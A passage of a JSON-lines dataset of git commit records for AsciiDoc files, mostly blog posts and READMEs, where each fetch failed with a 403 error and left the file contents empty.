\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,joshiste\/spring-boot,sebastiankirsch\/spring-boot,NetoDevel\/spring-boot,lexandro\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,rweisleder\/spring-boot,dreis2211\/spring-boot,pvorb\/spring-boot,mrumpf\/spring-boot,pvorb\/spring-boot,SaravananParthasarathy\/SPSDemo,jayarampradhan\/spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,spring-projects\/spring-boot,ihoneymon\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,xiaoleiPENG\/my-project,joshthornhill\/spring-boot,brettwooldridge\/spring-boot,xiaoleiPENG\/my-project,yangdd1205\/spring-boot,felipeg48\/spring-boot,zhanhb\/spring-boot,michael-simons\/spring-boot,thomasdarimont\/spring-boot,philwebb\/spring-boot,shakuzen\/spring-boot,sbuettner\/spring-boot,mbenson\/spring-boot,bbrouwer\/spring-boot,neo4j-contrib\/spring-boot,drumonii\/spring-boot,dfa1\/spring-boot,shangyi0102\/spring-boot,jayarampradhan\/spring-boot,dreis2211\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,tsachev\/spring-boot,akmaharshi\/jenkins,isopov\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,linead\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,bjornlindstrom\/spring-boot,sbcoba\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,vakninr\/spring-boot,yhj630520\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,kamilszymanski\/spring-boot,SaravananParthasarathy\/SPSDemo,qerub\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,RichardCSantana\/spring-boot,sebastiankirsch\/spring-boot,ilayaperumalg\/spring-boot,mrumpf\/spring-boot,lburgazzoli\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,bjornlindstrom\/spring-boot,ameraljovic\/spring-boot,shangyi0102\/spring-boot,vpavic\/spring-boot,bjornlindstrom\/spring-boot,ihoneymon\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,kamilszymanski\/spring-boot,linead\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,yangdd1205\/spring-boot,brettwooldridge\/spring-boot,bijukunjummen\/spring-boot,lucassaldanha\/spring-boot,bjornlindstrom\/spring-boot,DeezCashews\/spring-boot,xiaoleiPENG\/my-project,herau\/spring-boot,minmay\/spring-boot,Nowheresly\/spring-boot,javyzheng\/spring-boot,RichardCSantana\/spring-boot,RichardCSantana\/spring-boot,donhuvy\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,neo4j-contrib\/spring-boot,sbuettner\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,lburgazzoli\/spring-boot,NetoDevel\/spring-boot,wilkinsona\/spring-boot,jvz\/spring-boot,zhangshuangquan\/spring-root,izeye\/spring-boot,kamilszymanski\/spring-boot,wilkinsona\/spring-boot,kdvolder\/spring-boot,javyzheng\/spring-boot,deki\/spring-boot,candrews\/spring-boot,afroje-reshma\/spring-boot-sample,deki\/spring-boot,tiarebalbi\/spring-boot,RichardCSantana\/spring-boot,mrumpf\/spring-boot,joansmith\/spring-boot,michael-simons\/spring-boot,sebastiankirsch\/spring-boot,lenicliu\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,tsachev\/spring-boot,lburgazzoli\/spring-boot,herau\/spring-boot,shakuzen\/spring-boot,joshthornhill\/spring-boot,afroje-reshma\/spring-boot-sample,lucassaldanha\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,lburgazzoli\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,eddumelendez\/spring-boot,linead\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,dreis2211\/spring-boot,thomasdarimont\/spring-boot,ameraljovic\/spring-boot,Buzzardo\/spring-boot,DeezCashews\/spring-boot,philwebb\/spring-boot,nebhale\/spring-boot,neo4j-contrib\/spring-boot,candrews\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,jvz\/spring-boot,jxblum\/spring-boot,mosoft521\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,minmay\/spring-boot,kdvolder\/spring-boot,ollie314\/spring-boot,shakuzen\/spring-boot,hqrt\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,Buzzardo\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,Nowheresly\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,shakuzen\/spring-boot,mbogoevici\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,qerub\/spring-boot,jayarampradhan\/spring-boot,sbuettner\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,jmnarloch\/spring-boot,zhanhb\/spring-boot,sbcoba\/spring-boot,ameraljovic\/spring-boot,sbcoba\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,sbuettner\/spring-boot,bclozel\/spring-boot,joansmith\/spring-boot,bbrouwer\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot-concourse,jvz\/spring-boot,minmay\/spring-boot,ilayaperumalg\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,candrews\/spring-boot,akmaharshi\/jenkins,mdeinum\/spring-boot,jbovet\/spring-boot,chrylis\/spring-boot,mbogoevici\/spring-boot,joshiste\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,jxblum\/spring-boot,DeezCashews\/spring-boot,vakninr\/spring-boot,DeezCashews\/spring-boot,izeye\/spring-boot,bijukunjummen\/spring-boot,i007422\/jenkins2-course-spring-boot,kdvolder\/spring-boot,dfa1\/spring-boot,javyzheng\/spring-boot,thomasdarimont\/spring-boot,mdeinum\/spring-boot,dfa1\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,htynkn\/spring-boot,vakninr\/spring-boot,sbuettner\/spring-boot,habuma\/spring-boot,izeye\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,cleverjava\/jenkins2-course-spring-boot,herau\/spring-boot,i007422\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,mrumpf\/spring-boot,nebhale\/spring-boot,deki\/spring-boot,ameraljovic\/spring-boot,jmnarloch\/spring-boot,shakuzen\/spring-boot,ollie314\/spring-boot,dfa1\/spring-boot,michael-simons\/spring-boot,xiaoleiPENG\/my-project,ihoneymon\/spring-boot,kamilszymanski\/spring-boot,felipeg48\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,jbovet\/spring-boot,jmnarloch\/spring-boot,ihoneymon\/spring-boot,Nowheresly\/spring-boot,NetoDevel\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,royclarkson\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,akmaharshi\/jenkins,vpavic\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,mbogoevici\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,joshiste\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,lenicliu\/spring-boot,hqrt\/jenkins2-course-spring-boot,joansmith\/spring-boot,habuma\/spring-boot,yhj630520\/spring-boot,akmaharshi\/jenkins,ptahchiev\/spring-boot,mosoft521\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,yangdd1205\/spring-boot,DeezCashews\/spring-boot,lenicliu\/spring-boot,tsachev\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7326db42adc1163abaa513b03114f9d279b79d9c","subject":"#71 extended docs regarding node mapping","message":"#71 extended docs regarding node mapping\n","repos":"SMB-TEC\/extended-objects,buschmais\/extended-objects","old_file":"neo4j\/src\/main\/asciidoc\/index.asciidoc","new_file":"neo4j\/src\/main\/asciidoc\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SMB-TEC\/extended-objects.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b0202b7990ad86c90728ff3aa6a056a28221689","subject":"y2b create post Riding The New Segway miniPRO","message":"y2b create post Riding The New Segway miniPRO","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-30-Riding-The-New-Segway-miniPRO.adoc","new_file":"_posts\/2016-06-30-Riding-The-New-Segway-miniPRO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc6744f2b32e035e98359e76d3115d55e523138","subject":"y2b create post iPhone 8 Hands On With Mock-Up","message":"y2b create post iPhone 8 Hands On With Mock-Up","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-02-iPhone-8-Hands-On-With-MockUp.adoc","new_file":"_posts\/2017-05-02-iPhone-8-Hands-On-With-MockUp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08dfb78468fbd456d88329df5790147322fb37ee","subject":"Add differentiation between stopping and removing","message":"Add differentiation between stopping and removing\n\nSigned-off-by: Philipp Gille <591bfffdf6e3334e6a98ea9827b7ee5a394e4915@gmail.com>\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a6be2dc0f6c111e06fda842d2d1780801a3238","subject":"Publish 2016-6-27-json-decode-json-encode.adoc","message":"Publish 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-json-decode-json-encode.adoc","new_file":"2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5106000cdab141c6df16497289760942eb5fd3e6","subject":"add me as contributor","message":"add me as contributor\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/05_contributors.adoc","new_file":"src\/docs\/manual\/05_contributors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6706cfcf8fe8090f236335893b043dc64188a27","subject":"Update 2016-06-28-Contact.adoc","message":"Update 2016-06-28-Contact.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Contact.adoc","new_file":"_posts\/2016-06-28-Contact.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e50adbeded65497dbdc24d103034ccd2ea1e298","subject":"2016-07-08-America.adoc","message":"2016-07-08-America.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-08-America.adoc","new_file":"_posts\/2016-07-08-America.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f868868ca96eb7865d7579a90388438b10c541","subject":"Update 2017-01-15-A-title.adoc","message":"Update 2017-01-15-A-title.adoc","repos":"flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io","old_file":"_posts\/2017-01-15-A-title.adoc","new_file":"_posts\/2017-01-15-A-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flipswitchingmonkey\/flipswitchingmonkey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"089d51a130d93c9f6b077f913746c1280e5efaad","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c07ffe5f848433d3bab48727e4b41f7311b409f","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50806ebcea6e8f279e4182f81b568937333a4a03","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50c8eb0a84509bf09065e5331c6ea5cff63311a5","subject":"Update 2017-08-22-No-Whammies.adoc","message":"Update 2017-08-22-No-Whammies.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-08-22-No-Whammies.adoc","new_file":"_posts\/2017-08-22-No-Whammies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0286cb6548501277b57d1494aede2778df8e45a1","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fc6824d882469bedf3f353d0235b6690dc7cd14","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b1176b9695127c08f28e974153ce48de1430c1f","subject":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"067d8ac3eb5cbe8fad087857cd38a5e0ec32319a","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb069dad494d57f91e695d1dcbbad5a809b8ad9a","subject":"Update 2017-10-20-Your-Blog-title.adoc","message":"Update 2017-10-20-Your-Blog-title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-10-20-Your-Blog-title.adoc","new_file":"_posts\/2017-10-20-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66f54b7bdf1bc02dfdfd31553e326a7f0860d239","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b725fd783971c57b93bed24a232243d2dd0fb9","subject":"#58 added initial doc to fix build","message":"#58 added initial doc to fix build\n","repos":"openwms\/org.openwms.tms.transportation,openwms\/org.openwms.tms.transportation","old_file":"src\/main\/asciidoc\/api.adoc","new_file":"src\/main\/asciidoc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openwms\/org.openwms.tms.transportation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a815bdc93d606f6e44c78ce556b5c5568a19d11","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"161735d674c37f208a985467b4fb7c180c1ba4c7","subject":"Update 2015-10-13-Blog-Title.adoc","message":"Update 2015-10-13-Blog-Title.adoc","repos":"MinxianLi\/hubpress.io,MinxianLi\/hubpress.io,MinxianLi\/hubpress.io","old_file":"_posts\/2015-10-13-Blog-Title.adoc","new_file":"_posts\/2015-10-13-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MinxianLi\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf0affeebdc6d062008756d575bfc40ec525dfd5","subject":"Update 2016-6-26-first-title.adoc","message":"Update 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-first-title.adoc","new_file":"_posts\/2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b65d82bb3c52dc81cabf2b94e299e40ba191281","subject":"Update 2016-05-14-How-to-Blog.adoc","message":"Update 2016-05-14-How-to-Blog.adoc","repos":"TinkeringAlways\/tinkeringalways.github.io,TinkeringAlways\/tinkeringalways.github.io,TinkeringAlways\/tinkeringalways.github.io,TinkeringAlways\/tinkeringalways.github.io","old_file":"_posts\/2016-05-14-How-to-Blog.adoc","new_file":"_posts\/2016-05-14-How-to-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TinkeringAlways\/tinkeringalways.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"198e82bf897dfd1be1bb469913c1591a44c93cdd","subject":"Update 2016-09-06-Test-Post-1.adoc","message":"Update 2016-09-06-Test-Post-1.adoc","repos":"thomasgwills\/thomasgwills.github.io,thomasgwills\/thomasgwills.github.io,thomasgwills\/thomasgwills.github.io,thomasgwills\/thomasgwills.github.io","old_file":"_posts\/2016-09-06-Test-Post-1.adoc","new_file":"_posts\/2016-09-06-Test-Post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasgwills\/thomasgwills.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae722010219cdda454b5a7803e57753ce55572ff","subject":"Mark the docu","message":"Mark the docu\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7c023a7b4e4150a3290b961c06dfbaad48febec","subject":"Updated documentation","message":"Updated documentation\n","repos":"goldobin\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b02623b10d7d0c2c65a789b1171a4e8cd1ce51a8","subject":"chore: add badges","message":"chore: add badges\n","repos":"gravitee-io\/gravitee-plugin-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-plugin-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc4003920929d6f98b478e96a3fd5645e0af9567","subject":"Explicitly suggest using of official images","message":"Explicitly suggest using of official images\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb4345b97c8d8ef29162d399b3aa3b888b2377bd","subject":"Added coveralls badge to README","message":"Added coveralls badge to README\n","repos":"adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,joshuagn\/ANPR,justhackit\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43211852ccf17a88435771feb847123100f80243","subject":"Fix awkward wording","message":"Fix awkward wording\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e4f70cde74563028745b9344915ebbf5772465a2","subject":"Create README.adoc","message":"Create README.adoc","repos":"polyglot-plt\/tools.compiler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polyglot-plt\/tools.compiler.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ac992d40a8f28f4e421af088dca8f6c795bb2ba1","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b938a7b9ad611c25a9e7a56c1a5518c68878c7e3","subject":"docs: Fixed version and a typo in the quick start tutorial.","message":"docs: Fixed version and a typo in the quick start 